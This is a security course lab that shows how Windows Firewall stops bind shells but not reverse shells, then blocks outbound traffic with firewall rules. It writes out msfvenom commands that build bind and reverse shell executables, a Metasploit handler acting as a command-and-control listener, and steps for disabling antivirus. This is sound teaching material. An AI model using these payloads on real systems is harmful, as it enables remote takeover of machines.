15: Windows Firewall (30 pts. + 15 pts. extra credit)

What You Need

A Kali Linux machine to be the Attacker (I used Kali 2017.2 64-bit)
A Windows target machine without antivirus software--I recommend using your Windows Server 2016 target virtual machine.

Purpose

We will use Windows Firewall to block some common attacks: a bind shell and a reverse shell.

Task 15.1: Bind Shell (10 pts.)

Understanding a Bind Shell

A bind shell listens on the target system, using a TCP or UDP port. This is a very simple attack, and very easily stopped by a firewall. The default action of the Windows firewall is to block unexpected incoming packets, and that stops this attack.

Using Msfvenom to Make a Bind Shell

In Kali, execute this command to learn about the "windows/shell_bind_tcp" payload:

msfvenom -p windows/shell_bind_tcp --payload-options

Note: in later versions, the switch was changed from --payload-options to --list-options

This is a very simple payload, as shown below. It doesn't require any parameters, and listens on port 4444 by default, serving up a CMD shell.

In Kali, execute these commands to create a malicious Windows executable file named "shell_bind.exe" and serve it from a malicious Web server.

msfvenom -p windows/shell_bind_tcp -f exe > /var/www/html/shell_bind.exe service apache2 start

The operation proceeds without errors, as shown below.

Finding the Attacker's IP Address

On your Linux machine, in a Terminal window, execute this command:

ifconfig

Find your IP address and make a note of it. In the example below, it is 172.16.1.203.

Turning Off Windows Firewall

On your Windows desktop, click the Start button and type Firewall.

In the search results, click "Windows Firewall", which is the second result in the image below.

In the "Windows Firewall", on the left side, click "Turn Windows Firewall on or off".

In the "Customize Settings" box, click both Off buttons, as shown below.

Click OK.

Close the "Windows Firewall" box.

Launching the Bind Shell on the Target Machine

On the target Windows machine, open Internet Explorer (not Chrome) and open this URL, replacing the IP address with the IP address of your Kali machine:

http://172.16.1.203/shell_bind.exe

The file "shell_bind.exe" downloads.

If warning boxes appear, such as those shown below, click Actions, "More options", "Run anyway".

Note: if you are using antivirus, you will need to disable it. You will also need to disable Windows Defender's "realtime protection", as explained in Project 2.

Viewing the Listening Process

On your Windows machine, click Start and type CMD.

In the results, right-click "Command Prompt" and click "Run as administrator", as shown below.

If a User Account Control box pops up, click Yes.

In the Administrator Command Prompt window, execute this command, which shows information about all processes using network connections.

netstat -bano | more

You can see the shell_bind.exe process listening on port 4444, as shown below.

Finding the Windows Server's IP Address

In the Administrator Command Prompt window, execute this command, to find your IP address.

ipconfig | more

Find your Windows server's IP address, as shown below.

Using the Bind Shell

On your Kali machine, execute this command, replacing the IP address with the IP address of your Windows server:

nc 172.16.1.208 4444

A "Microsoft Window" banner appears, as shown below. Execute this command to view the network connection you are using.

netstat -an | findstr 4444

A connection to the Windows server on port 4444 appears, with its status on the right side, covered by a gray box in the image below.

15.1: Recording Your Success (10 pts.)

Use the form below to record your score in Canvas.

If you don't have a Canvas account, see the instructions here.

Name or Email:

Connection Status:

Turning On Windows Firewall

On your Windows desktop, click the Start button and type Firewall.

In the search results, click "Windows Firewall".

In the "Windows Firewall", on the left side, click "Turn Windows Firewall on or off".

In the "Customize Settings" box, click both On buttons, as shown below.

Click OK.

Close the "Windows Firewall" box.

Attempting to Use the Bind Shell

On your Kali machine, in the Terminal window running "nc", press Enter, and try typing a command, such as help. You get no response. You cannot control the Windows machine anymore, as shown below, because the firewall is blocking your commands.

Task 15.2: Reverse Shell (10 pts.)

Understanding a Reverse Shell

A reverse shell originates the connection from the target server, sending a SYN out to the attacker's Command & Control server, which listens for incoming traffic.

Any computer that allows Web browsing must allow connections to external IP addresses on common ports, such as 80 and 443, so this attack works even when Windows Firewall is on, in its default state.

Using Msfvenom to Make a Reverse Shell

In Kali, execute this command to learn about the "windows/shell_reverse_tcp" payload:

msfvenom -p windows/shell_reverse_tcp --payload-options

This payload, requires only one paramater: LHOST, as shown below.

Troubleshooting
If msfvenom crashes, with an "undefined method 'supported_ssl_methods'" message, as shown below:

you can fix it by installing a "nightly build" with these commands:
cd /tmp wget https://apt.metasploit.com/pool/main/m/metasploit-framework/metasploit-framework_4.17.0%2B20180814103546.git.3.27bab54~1rapid7-1_amd64.deb rm -rf /usr/share/metasploit-framework dpkg -i metasploit-framework_4.17.0%2B20180814103546.git.3.27bab54~1rapid7-1_amd64.deb
For more information, see Metasploit Nightly Installers.

In Kali, execute this command to create a malicious Windows executable file named "shell_reverse.exe", replacing the IP address with the IP address of your Kali machine.

msfvenom -p windows/shell_reverse_tcp LHOST=172.16.1.130 -f exe > /var/www/html/shell_reverse.exe

The operation proceeds without errors, as shown below.

Starting a Command-and-Control (C&C) Server

Execute these commands to start a C&C listener.

msfconsole use multi/handler set PAYLOAD windows/shell_reverse_tcp set LHOST 0.0.0.0 exploit

Metasploit starts a "reverse TCP handler", as shown below.

Launching the Reverse Shell on the Target Machine

On the target Windows machine, open Internet Explorer (not Chrome) and open this URL, replacing the IP address with the IP address of your Kali machine:

http://172.16.1.130/shell_reverse.exe

The file "shell_reverse.exe" downloads.

If warning boxes appear, such as those shown below, click Actions, "More options", "Run anyway".

Note: if you are using antivirus, you will need to disable it. You will also need to disable Windows Defender's "realtime protection", as explained in Project 2.

Using the Reverse Shell

On your Kali machine, a "Command shell session" opens, as shown below.

A "Microsoft Window" banner appears, as shown below. Execute this command to view the process you are using.

tasklist /V /FI "IMAGENAME eq shell*"

Find the entry starting with shell_reverse.exe, as shown below. Look at the "Session Name", which is , covered by a gray box in the image below.

Enter that name in the form below to record your success.

15.2: Recording Your Success (10 pts.)

Use the form below to record your score in Canvas.

If you don't have a Canvas account, see the instructions here.

Name or Email:

Session Name:

Task 15.3: Blocking Outgoing Connections with Windows Firewall

Opening Windows Firewall with Advanced Security

On your Windows desktop, click the Start button and type Firewall.

In the search results, click "Windows Firewall with Advanced Security", as shown below.

Windows Firewall with Advanced Security opens.

In the left pane, click "Windows Firewall with Advanced Security", as shown below.

In the center pane, check to see that Windows Firewall is On for the Actve profile.

In the image below, the "Public Profile is Active", but the firewall is off for the Public profile.

To turn the firewall on, in the center pane, near the bottom, click "Windows Firewall Properties".

In the Properties sheet, on the avtivve tab (Domain, Private, or Public), change the "Firewall state" to "On (recommended)", as shown below. Click OK.

On the left side of "Windows Firewall with Advanced Security", click "Outbound Rules". On the top right, click "New Rule...".

In the "New Outbound Rule Wizard" box, on the "Rule Type" page, click Port, as shown below, and click Next.

In the "New Outbound Rule Wizard" box, on the "Protocol and Ports" page, accept the default selection of TCP. Click "All remote ports", as shown below, and click Next.

In the "New Outbound Rule Wizard" box, on the "Action" page, accept the default selection of Block, and click Next.

In the "New Outbound Rule Wizard" box, on the "Profile" page, accept the default selections, and click Next.

In the "New Outbound Rule Wizard" box, on the "Name" page, enter a name of "NO OUTBOUND CONNECTIONS", as shown below, and click Finish.

Viewing the Kali Reverse Shell Handler

On your Kali machine, click in the window showing your connected shell and press Enter.

The reverse shell closes, as shown below.

Find the "Reason", covered in a gray box in the image below.

Enter that reason into the form below to record your success.

15.3 Recording Your Success (10 pts.)

Use the form below to record your score in Canvas.

If you don't have a Canvas account, see the instructions here.

Name or Email:

Reason:

Restoring the Firewall to Normal Operation

To make your Windows machine useful for other projects again, do this:

Click Start, type CONTROL. and open Control Panel.

Click "System and Security".

Click "Windows Firewall".

On the left pane, click "Restore defaults", as shown below.

Click "Restore defaults".

Click Yes to confirm.

Task 15.4: Reverse Shell on Linux (15 pts. extra credit)

Set up an Ubuntu Linux machine, create reverse-shell malware on Kali, and run it, as shown below.

On Kali, in the reverse shell, execute this command:

netstat -pant

Find the connection to port 4444, highlighted in the image below.

Find the "PID/Program name" value for this connection, covered by a gray box in the image below.

Enter the "PID/Program name" value in the form below to record your success.

15.4 Recording Your Success (15 pts. extra credit)

Use the form below to record your score in Canvas.

If you don't have a Canvas account, see the instructions here.

Name or Email:

PID/Program name:

Blocking Outgoing Connections with ufw

Open another Terminal on your Ubuntu server and use the commands shown below to block the reverse shell.

To turn the firewall off again, execute this command:

sudo ufw disable

Sources

Metasploit Nightly Installers

Posted 8-14-18
Firewall "On" steps added 11-6-18